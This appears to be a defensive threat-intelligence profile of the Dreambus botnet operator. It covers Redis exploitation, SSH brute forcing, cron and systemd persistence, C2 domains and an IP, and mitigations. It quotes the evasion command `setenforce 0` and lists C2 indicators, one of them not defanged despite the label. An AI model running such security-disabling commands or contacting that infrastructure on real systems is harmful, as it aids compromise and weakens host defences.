Full Report
See Dreambus operator for more information.
Analysis Summary
# Threat Actor: Dreambus Operator
## Attribution & Identity
- **Aliases:** Dreambus, Sandpiper.
- **Identity:** A cybercriminal group believed to be of Russian origin, or at least operating from a Russian-speaking region, primarily focused on cryptojacking and large-scale botnet operations.
- **Associations:** Associated with the "DreamBus" modular botnet/malware family.
## Activity Summary
The Dreambus operator is known for managing a sophisticated, modular botnet that targets Linux-based systems. Their historical activity is characterized by large-scale automated scanning for exposed enterprise applications. Recent operations have focused on exploiting vulnerabilities in Redis, PostgreSQL, and other database/cloud-native technologies to deploy Monero (XMR) miners.
## Tactics, Techniques & Procedures
- **Initial Access:** Exploitation of known vulnerabilities (e.g., CVE-2022-0543 in Redis) and brute-forcing weak credentials on SSH and database services.
- **Persistence:** Use of `systemd` services and `cron` jobs to ensure the malware persists through reboots.
- **Execution:** Deployment of modular ELF binaries tailored for Linux architectures.
- **Evasion:** The operator frequently uses the `upx` packer and employs base64 encoding/obfuscation for shell scripts. It also disables competing cryptominers and security auditing tools (e.g., `setenforce 0`).
- **Lateral Movement:** Utilizing SSH keys found on compromised systems to spread further within the network.
- **MITRE ATT&CK IDs:**
- T1190 (Exploit Public-Facing Application)
- T1021.004 (SSH)
- T1496 (Resource Hijacking)
- T1543.002 (Systemd Service)
## Targeting
- **Sectors:** Cloud infrastructure, technology, and any enterprise utilizing Linux-based database servers.
- **Geography:** Global targeting; however, a high concentration of victims has historically been observed in the United States, Europe, and East Asia.
- **Victims:** Servers running Redis, PostgreSQL, MySQL, Hadoop, and Jenkins.
## Tools & Infrastructure
- **Malware:** Dreambus (modular botnet), XMRig (cryptominer).
- **Infrastructure:**
- Uses Tor-to-web (Tor2Web) gateways for C2 communication to hide the true origin of the command servers.
- C2 Domains: `z999qwe.com`, `release.letsmakecloud[.]com`, `api.u789ghj[.]com` (defanged).
- C2 IPs: `103.214.5[.]208` (defanged).
## Implications
The Dreambus operator represents a persistent threat to cloud and server environments. While their primary objective is financial (cryptomining), the level of access they achieve (often root/administrative) means they could pivot to data exfiltration or ransomware deployment at any time. Their ability to rapidly weaponize New Day-1 vulnerabilities in enterprise software makes them a high-priority threat for DevOps and IT security teams.
## Mitigations
- **Patch Management:** Prioritize patching of public-facing database services (specifically Redis and PostgreSQL).
- **Credential Hygiene:** Implement strong, unique passwords and utilize SSH keys instead of password-based authentication for Linux servers.
- **Egress Filtering:** Restrict outbound traffic from servers to only necessary ports and recognized IP ranges to disrupt C2 communication and cryptomining pools.
- **Monitoring:** Monitor for unusual CPU spikes and the creation of unauthorized `systemd` services or `cron` entries.